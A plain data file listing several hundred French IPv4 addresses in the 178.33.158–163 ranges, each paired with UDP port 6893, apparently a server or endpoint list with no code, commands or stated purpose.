FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
